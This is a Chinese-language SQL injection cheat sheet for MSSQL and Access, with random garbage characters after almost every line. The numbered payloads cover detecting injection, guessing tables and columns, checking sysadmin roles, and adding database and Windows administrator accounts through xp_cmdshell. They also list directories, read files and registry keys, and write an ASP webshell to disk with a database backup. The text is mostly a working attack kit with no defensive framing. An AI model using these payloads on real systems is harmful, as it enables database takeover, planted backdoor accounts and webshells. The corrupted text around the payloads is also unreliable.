1.判断是否有注入;and 1=1 ;and 1=2 8$���k�XC+
2.初步判断是否是mssql ;and user>0 })l���T fy
\q��|P�Hl�
3.注入参数是字符'and [查询条件] and ''=' 3{:<z�4>{
rcm�AVl:$>
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ;�
,<�J:%s
}>~>5jc/Pg
5.判断数据库系统 zD;]
s�k4
Te}�yQ=��+
;and (select count(*) from sysobjects)>0 mssql !u}3H�|�6~
1cBhcYv"�
;and (select count(*) from msysobjects)>0 access E�E�6|9K>�
!<z�zP LC�
'5/}MMT���
� �M����K"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Z�w�][c7%�
x,gE$dNzy�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 #�L:P��
R>
"q^'5�p�]
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 B��Q&q<6Tk
V )k,� 9=�
9.(1)猜字段的ascii值(access) ,l .U^d6>
N%A�`rY}�u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 y!N�)��@y4
(mIJI,[xn�
(2)猜字段的ascii值(mssql) lp-Zx[#`}C
m%�c0�#�=D
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F}(Q��KO*
n
�E}<e:�
10.测试权限结构(mssql) 0"ps�Kf��'
4F,�Ql"ae(
[C�qqjv�;_
uQ]]]Z�(H'
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- OsL�%SKs�|
Vnj�/�>e�3
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �`uZv9��I"
BD�kBYhz;7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- }K80G�~O2<
^L��mc%��y
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- C'c�zXZtn
p_q��m}zp
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 2{B�(��j&{
]p&<��nK,
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Jr�d�4a~XP
prEu9$�:�t
;and 1=(select IS_MEMBER('db_owner'));-- �rk,1am:cg
g~c|~u(W��
uy _��i{Y|
&s^>S?��L-
11.添加mssql和系统的帐户 rgdQR^!l6�
Eu/y�">;v#
;exec master.dbo.sp_addlogin username;-- ��U+PCvl=x
;exec master.dbo.sp_password null,username,password;-- Cz@F�Zb8��
,r 2VP\hLh
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- V�.Ba�''E7
)�s<���WG}
;exec master.dbo.xp_cmdshell 'net user username password Y�uo1'gE�+
?QS��x��8d
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- B�U:Ecchbr
n R\n�\
��
;exec master.dbo.xp_cmdshell 'net user username password /add';-- [T�K?� �P0
/w�it��Du7
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- I\rZ�k9��F
2PR7M.V�7
�>�mFX^t_,
}�u-�S j/K
12.(1)遍历目录 Wda\a.bXT
P"�9�@8aLB
;create table dirs(paths varchar(100), id int) 0L0Jc,�(F+
3Wb2p'V7$?
;insert dirs exec master.dbo.xp_dirtree 'c:\' @?3�vR�s}h
KT];�SF�^Y
;and (select top 1 paths from dirs)>0 =Esbeb�7P�
nl'J.d�J�e
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) z/0yO@_D/q
}W�O9�!E(
WiNr866n�B
J[��!x%8m�
(2)遍历目录 K)Z�kj"�y
j��emx�k�y
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6I&j
c�HH�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 WH�gV_�o 8
�D#d8��^�U
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 tCbr<��U�g
VPM|�R�j:d
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 e�MN+qkvH�
Wg`�+�u��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 L7Q����o-
]D{c4)\7C|
Bn1L�?�>G
2~�M;L�&9-
13.mssql中的存储过程 �eA�1k)gjE
8�K�.s�@�<
xp_regenumvalues 注册表根键, 子键 o�E�!hF�}O
}0B�L0N`_�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Nq�T1b�uU#
A�pG�'j�N�
xp_regread 根键,子键,键值名 ..�jq�[(;N
8�B��*E+f0
;exec xp_regread x�/%7%_+'�
��rkfQr9Vc
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ]{��|fYt_-
+MNSZLP��]
xp_regwrite 根键,子键, 值名, 值类型, 值 tg7C��;rJ
{5QosC+o6Q
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 U�~�{�Sa�+
g�b=80��s0
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ���N
b3I%r
�~>#�LOT `
xp_regdeletevalue 根键,子键,值名 O�1?B{F/ e
1�� [fo�'M
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 FgO�U���e
*MYt:ms���
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �(|�g").L�
>`hSye{���
��*|];f#^9
#"Ek�s79s
14.mssql的backup创建webshell t���7|MkX1
YKP=0 j3,�
use model �|?x�^8e<*
,VK�QR�m�d
create table cmd(str image); �0��W~.WkD
{A]k%�74-a
insert into cmd(str) values (''); �0�rk�u4T�
a��9#W9�eP
backup database model to disk='c:\l.asp'; w::�r�?�.9
�;JOD!���|
v��7���8&[
*>e�~�_{�F
15.mssql内置函数 �8?e�� ��
��|`w$|pm=
;and (select @@version)>0 获得Windows的版本号 �cs���K>iN
=c�dh'"X�N
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �gf0PMc3l�
/:�#�j��?c
;and (select user_name())>0 爆当前系统的连接用户 :v#�k&Uh3y
�W
�*Y��W6
;and (select db_name())>0 得到当前连接的数据库 I:�F��'S#
�Ev�wbhvA(
cy1�\u2x_`
�A�#Xj]^-*
16.简洁的webshell tCZpf�Z@+=
`G��vA24�1
use model IIq"e~�"Vs
')C|`(hs��
create table cmd(str image); LKqRv�P�nh
c�JP'ShnCh
insert into cmd(str) values (''); xik`�W!1�S
<9��@&oN+T
backup database model to disk='g:\wwwtest\l.asp';
